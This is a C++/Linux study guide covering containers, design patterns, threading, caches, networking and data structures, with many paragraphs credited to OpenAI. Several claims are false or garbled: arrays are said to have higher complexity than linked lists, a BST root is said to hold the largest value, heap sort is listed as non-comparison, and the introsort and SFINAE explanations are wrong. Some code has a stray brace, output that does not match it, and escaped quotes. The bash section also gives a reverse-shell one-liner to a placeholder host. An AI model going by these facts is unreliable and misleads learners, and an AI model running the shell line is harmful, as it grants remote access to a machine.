Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Thu Nov 30 05:04:02 UTC 2023

Forward

An ode to C++

Let’s start with a haiku written by a computer.

C++ code so vast
Creating wonders so fast
Mysteries unfold

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


The C++ Standard Library containers

The C++ Standard Library containers provide a set of powerful and efficient data structures that make it easy to store and manipulate data. They are also highly optimized for performance, making them ideal for applications that require fast access to data. They are also highly portable and can be used across different platforms and architectures. The containers also provide a convenient way to manage memory, allowing for efficient memory management and reducing the risk of memory leaks. Finally, the containers provide rich API features and support for a variety of algorithms, making it easier to develop high-performance applications.

  1. vector
  2. list
  3. deque
  4. map
  5. set
  6. unordered_map
  7. unordered_set
  8. stack
  9. queue
  10. priority_queue

Categories of containers

Sequence containers are data structures that store elements in a linear, ordered fashion. Examples include vectors, deques, and lists.

Associative containers are data structures that store elements in an unordered fashion, but provide access to elements via a key. Examples include maps, sets, and unordered_maps.

Choosing a container


Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Notation
Constant O(1)
Logarithmic O(log n)
Linear O(n)
Quadratic O(n2)
Exponential O(2n)

Comparing two fundamental data structures

Linked lists have an average complexity of O(n), while arrays have an average complexity of O(1). Arrays have a higher average complexity than linked lists, as they can access elements quickly and efficiently. However, linked lists are better for inserting and deleting elements as they can be done in constant time.


The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting; even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if:

See the complete article.


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};

Design patterns

Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide a common language that designers and developers can use to communicate solutions to recurring problems and to make it easier to create more flexible, robust, and maintainable code. Design patterns also help developers to better understand the underlying software architecture, which in turn helps to create better software.

Categories

Common patterns

  1. Singleton Pattern
  2. Factory Pattern
  3. Adapter Pattern
  4. Facade Pattern
  5. Command Pattern
  6. Observer Pattern
  7. Model-View-Controller (MVC) Pattern
  8. State Pattern
  9. Strategy Pattern
  10. Composite Pattern

Factory pattern

The factory design pattern is a creational design pattern that provides a way to encapsulate object creation code, allowing for the abstraction of the object creation process and the decoupling of the use of an object from its implementation. The pattern involves a factory object that is responsible for creating other objects based on some set of input. This allows for a single point of control for object creation, and allows for the flexibility of creating different types of objects based on the input.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The visitor design pattern is a behavioral design pattern that allows for the manipulation of individual objects within a larger collection of objects. This pattern uses a separate "visitor" object which is responsible for applying a specific operation to each object in a collection. The visitor object is able to traverse the collection and apply the desired operation to each object without having the knowledge of the structure of the collection itself. This enables the application of new operations to existing collections without having to modify the collection’s structure. Additionally, the visitor pattern allows for multiple operations to be applied to the collection’s objects with the same visitor.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch in subtype polymorphism is a method of dispatching a function call to different implementations based on the runtime type of two objects involved in the method call. It works by having a method on one object call a method on the other object, passing in the type of the first object. The second object then uses the type information to determine which implementation to use for the method call. This allows for more specific and dynamic behavior than traditional single dispatch polymorphism.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a software design principle that states that high-level modules should not depend on low-level modules, but rather they should both depend on abstractions. This principle helps to invert the dependencies between software components, helping to decouple software systems and reduce the risk of changes in one module breaking the other.


Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that uses objects and their interactions to design applications and computer programs. OOP focuses on the creation of reusable code through the use of classes and objects. It emphasizes data abstraction and promotes code reusability by creating relationships between objects. OOP is based on the concept of encapsulation that allows data and functions to be bundled together in an object, and polymorphism which allows objects to take different forms. OOP also makes it easier to manage complex programs by providing structure and organization.

Polymorphism

  1. Ad-hoc Polymorphism: Ad-hoc polymorphism, also known as overloading, is a type of polymorphism in which a single function or operator can operate on multiple types of data.

  2. Parametric Polymorphism: Parametric polymorphism is a type of polymorphism in which a function or operator can take arguments of different types and can produce a different result based on the argument type.

  3. Subtype Polymorphism: Subtype polymorphism is a type of polymorphism in which an object can have multiple types, and the behavior of the object depends on the type. This type of polymorphism is often referred to as inheritance.

  4. Coercion Polymorphism: Coercion polymorphism is a type of polymorphism in which an object of one type is automatically converted into an object of another type. This type of polymorphism helps to reduce the amount of code needed to write programs.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.

RAII

RAII stands for Resource Acquisition Is Initialization. It is a programming idiom used in C++ to ensure that resources that are acquired are properly released when no longer needed, regardless of how the code using the resource exits. It is achieved by tying resource lifetime to object lifetime; when an object is created, it acquires the resource, and when the object is destroyed, the resource is released automatically. This prevents memory leaks and other errors caused by the incorrect management of resources.


Algorithms

The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

The time complexity of quicksort is O(n log n) on average, and O(n^2) in the worst case.

Below is a Python implementation just for fun. But how is it implemented in C++?

def quicksort(arr):
    if len(arr) <= 1:
        return arr
    pivot = arr[len(arr) // 2]
    left = [x for x in arr if x < pivot]
    middle = [x for x in arr if x == pivot]
    right = [x for x in arr if x > pivot]
    return quicksort(left) + middle + quicksort(right)

print(quicksort([3,6,8,10,1,2,1])) # Prints [1, 1, 2, 3, 6, 8, 10]

std::sort uses Introsort

Introsort is a sorting algorithm that combines the best features of quicksort and heapsort. It starts with quicksort, which is used to partition the data into two sub-arrays based on a chosen pivot element. If the sub-arrays become too unbalanced, the algorithm switches to heapsort, which is a more stable sorting method. Finally, if the heapsort phase takes too long, the algorithm falls back to a simple insertion sort. This combination of algorithms provides a fast and efficient sorting method with good space complexity.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

The complexity of different sorting algorithms can vary widely. The most common sorting algorithms can be divided into two categories: comparison sorts and non-comparison sorts.

Comparison sorts are algorithms that compare each element in the array to the other elements in order to sort them. Examples of comparison sorts include Bubble Sort, Insertion Sort, Selection Sort, Merge Sort, and Quick Sort. The time complexity of these sorting algorithms ranges from O(n2) for Bubble Sort and Insertion Sort, to O(nlogn) for Merge Sort and Quick Sort.

Non-comparison sorts are algorithms that do not compare the elements in the array in order to sort them. Examples of non-comparison sorts include Counting Sort, Radix Sort, Bucket Sort, and Heap Sort. The time complexity of these sorting algorithms ranges from O(n) for Counting Sort and Radix Sort, to O(nlogn) for Bucket Sort and Heap Sort.

Overall, the most efficient sorting algorithms are Merge Sort and Quick Sort, both of which have a time complexity of O(nlogn).

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.

References

OpenAI generated interview questions

  1. What is your experience with object-oriented programming?

  2. Describe a project you have worked on that involved working with a large dataset.

  3. What challenges have you faced when debugging a complex algorithm?

  4. Explain the differences between a relational database and a non-relational database.

  5. How would you go about designing a web application from scratch?

  6. What is the difference between C and C++?

  7. What is polymorphism and how is it implemented in C++?

  8. What are the advantages and disadvantages of using templates in C++?

  9. What is a namespace and how is it used in C++?

  10. How does memory management work in C++?


Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.


Caches

Processor caches are small, high-speed memory caches located on the processor or close to the processor. They store frequently used instructions and data so that the processor can access them quickly, allowing for faster processing speeds. Caches come in various sizes, with larger caches allowing for faster access to instructions and data. By caching the data, the processor does not need to access the main memory as often, which reduces the time it takes to complete tasks.

Cache coherence

Cache coherence is a property of a multiprocessor system in which all the processors share the same memory. It ensures that when one processor modifies a memory location, the other processors can see the change. This is achieved by maintaining a consistent view of the data in the memory across all processors. Cache coherence protocols ensure that the caches remain consistent by using a variety of techniques such as snooping, broadcast, invalidation, and bus locking. These protocols ensure that the data in the caches is consistent, and that the caches remain coherent.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

Cache misses occur when the data that is requested by the CPU is not present in the cache. This can result in increased latency as the CPU has to go out to main memory to fetch the data. The more cache misses that occur, the slower the overall system performance will be.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

Cache locality

Cache locality is a concept in computer architecture which states that programs tend to access data items that are clustered together in memory. This means that if a program accesses one data item, the next one it accesses is likely to be located in the same or nearby memory locations. This can create performance improvements due to the fact that data items can be fetched from the processor’s cache rather than the main memory, resulting in faster access times.

Further reading


Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice begin and end parameters don’t specify a namespace, see ADL.

#include <iostream>
#include <vector>
#include <iterator>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "n"));
}

Hash functions

A hash function is a mathematical function that takes an input of any size and produces an output, called a hash, of a fixed size. It is used to generate a unique value for a given data set or item, usually for data security and integrity purposes. Hash functions are commonly used in data structures and algorithms, as well as in cryptography.

Properties of a hashing algorithm

String hashing


Parallelism

Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance!

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law is a principle that states that the speedup of a program or system using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. The law is named after computer scientist Gene Amdahl, and was presented in his 1967 article "Validity of the Single Processor Approach to Achieving Large-Scale Computing Capabilities". The speedup in performance of a program or system is limited by the time needed for the part of the program that cannot be parallelized. This law implies that not all tasks can be accelerated by adding more processors.

It’s very easy to optimise the bits your are familiar with but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

A routine can be described as reentrant if it can be interrupted without an not leave the operation partially complete: the invariants remain true.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants are mathematical statements or logical expressions that remain true in all possible scenarios or under certain conditions. They are used in computer science to define properties of a system that should be maintained in order to ensure the correctness of the system, or to prove the correctness of a system. In other words, invariants are properties of a system that do not change over time.

Idempotence

A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: Race conditions in computer science refer to situations in which the output of a computer program or system depends on the sequence or timing of other uncontrollable events. This can occur when two or more processes or threads are trying to access or modify the same data at the same time. If the order of access is not defined, a race condition can occur, resulting in unexpected or incorrect output. The term is most commonly used in the context of multi-threaded programs, but race conditions can occur in any type of computer program.

Considerations

Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed and remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item agains and the deadlock continues.

OpenAI: Deadlocks occur when two or more threads, processes, or transactions are waiting for each other to finish, but they never do. This can cause a system to become unresponsive. Livelocks are similar to deadlocks, but instead of threads waiting for each other to finish, they continuously change their state in response to the other threads. This can cause a system to become unresponsive as well.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.

OpenAI: 1. Avoid long-running transactions: If possible, avoid running long-running transactions.

  1. Use a lock timeout: A lock timeout allows the system to abort the transaction if a lock can’t be acquired in a certain amount of time.

  2. Use lock escalation: Lock escalation reduces the number of locks required for a transaction by using higher-level locks.

  3. Use deadlock detection and resolution: Deadlock detection and resolution algorithms can be used to detect and resolve deadlocks.

  4. Use read-committed isolation levels: This isolation level reduces the likelihood of deadlocks by only allowing a transaction to acquire locks on resources that it needs to update.

  5. Use multiple granular locks: This reduces the likelihood of a deadlock by ensuring that locks are acquired on resources in a predictable order.

  6. Design transactions carefully: Careful design of transactions can reduce the likelihood of deadlocks by ensuring that locks are acquired in the correct order.

See also

Additionally

Synchronising threads

OpenAI: Mutex and semaphore are both synchronization primitives that are used to control access to shared resources.

A mutex is a locking mechanism that is used to synchronize access to a resource by multiple threads. It is "locked" by one thread and "unlocked" by another, allowing only one thread at a time to access the resource.

A semaphore is a signaling mechanism that allows threads to communicate with each other. It is used to signal when a resource is available or when a certain condition has been met. Unlike a mutex, a semaphore can be used to allow multiple threads to access a resource simultaneously.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be decalared consecutively in the code; so consider what this might mean when both mutex and data are in the same cache line.

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

OpenAI: Threads and processes are both ways of running instructions on a computer. A thread is a single sequence of instructions within a process while a process is a program running on the computer. Threads can be thought of as multiple lines of instruction within a process. Processes have their own memory address space and resources, while threads share the same memory address space and resources as the process they are part of. Threads are typically faster than processes as they can share data and resources more efficiently. Processes are more secure as they have their own memory address space and resources, which prevents one process from accessing the resources of another.

Thread bests practice

References


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack / Local variables
heap /\ Dynamic memory
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code
  1. Text Segment: This is the code segment which contains the actual instructions to be executed. It usually contains the program code, as well as any constants and variables used by the program.

  2. Data Segment: This segment contains initialized and uninitialized data used by the program.

  3. BSS Segment: This segment contains uninitialized data such as global variables and static variables.

  4. Heap Segment: This segment is used to store dynamically allocated memory.

  5. Stack Segment: This segment is used to store local variables and function parameters.


C++ linkage

Internal Linkage: Objects with internal linkage are only visible within the translation unit (TU) in which they are defined. This means that they can’t be used in other TUs. In C++, static variables and functions have internal linkage.

External Linkage: Objects with external linkage are visible to all other TUs in a program. This means that variables and functions with external linkage can be used in multiple TUs. In C++, variables and functions that are declared without the static keyword have external linkage.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. Quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads – they will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine destroy the future and the exception is rethrown by the calling get() routine.

std::thread

You need to call join() for every thread created with std::thread. This can be done by storing your threads as a vector and joining each of them in a loop.

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or single, but also I think it expresses intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream> 
#include <thread> 
#include <mutex> 
#include <condition_variable> 
#include <queue> 

const int MAX_SIZE = 10; 

std::mutex m; 
std::condition_variable cv; 
std::queue<int> q; 

void producer() 
{ 
    int i = 0; 
    while (true) { 
        std::unique_lock<std::mutex> lk(m); 
        cv.wait(lk, [] {return q.size() < MAX_SIZE; }); 

        q.push(i++); 
        std::cout << \"Produced \" << i - 1 << std::endl; 
        lk.unlock(); 
        cv.notify_one(); 
    } 
} 

void consumer() 
{ 
    while (true) { 
        std::unique_lock<std::mutex> lk(m); 
        cv.wait(lk, [] {return q.size() > 0; }); 

        int item = q.front(); 
        q.pop(); 
        std::cout << \"Consumed \" << item << std::endl; 
        lk.unlock(); 
        cv.notify_one(); 
    } 
} 

int main() 
{ 
    std::thread t1(producer); 
    std::thread t2(consumer); 
    t1.join(); 
    t2.join(); 
    return 0; 
}

The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit


What are the most difficult concepts in computer science?


The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a programming technique in which templates are used to generate program code during compilation. It is a powerful and efficient way to create generic algorithms and data structures, and to optimize code. Template metaprogramming is based on the concept of meta-programming, which uses templates as a form of compile time code generation. The main advantage of template metaprogramming is that it allows developers to write code that is both highly efficient and highly expressive, while still being maintainable and readable. Template metaprogramming can also be used to create code that is more type-safe than traditional code.

Templates are used in the C++ Standard Library to allow functions and classes to operate with a range of data types without the need for a programmer to create a separate version of the function or class for each type. This allows functions and classes to be written once and used with any data type that can meet the requirements of the function or class. Templates also provide type safety, ensuring that the correct type is used when calling a function or creating an instance of a class.

SFINAE

SFINAE stands for Substitution Failure Is Not An Error. It is a feature in C++ which allows for specific compiler error messages when a substitution fails during template instantiation. This prevents undesired behavior or compiler errors when an incorrect substitution is attempted. SFINAE allows for the compiler to ignore invalid template specialization attempts, and allows for the user to include multiple template instantiations without the compiler raising an error. This feature is often used to control template argument deduction, as well as to create type traits.


Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Description
Layer 7 Application
Layer 6 Presentation
Layer 5 Session
Layer 4 Transport
Layer 3 Network
Layer 2 Data Link
Layer 1 Physical

Three way handshake

  1. The TCP three way handshake begins when a client sends a TCP SYN (synchronize) packet to a server. The SYN packet contains the initial sequence number for the client.

  2. The server responds with a SYN-ACK (synchronize-acknowledge) packet, which contains the initial sequence number for the server and an acknowledgment of the client’s initial sequence number.

  3. The client then sends an ACK (acknowledge) packet to the server, which acknowledges the server’s initial sequence number. This completes the three way handshake and establishes a connection between the two hosts.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

Data structures

It’s important to know the common data structures and their characteristics.

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

A binary search tree (BST) is a type of data structure which is used to store data in a specific order. It is a type of binary tree where each node has at most two children, which are referred to as the left child and the right child. The left subtree of a node contains only nodes with values less than the parent node, while the right subtree of a node contains only nodes with values greater than the parent node. The root node of a BST is the node with the largest value. The BST is very efficient for searching and sorting because it allows quick access to the data.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.

123456789abcedef
1
23
4567
89abcdef

Project down, the top of the tree is a smallest element.

       1
   2       3
 4   5   6   7
8 9 a b c d e f
       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

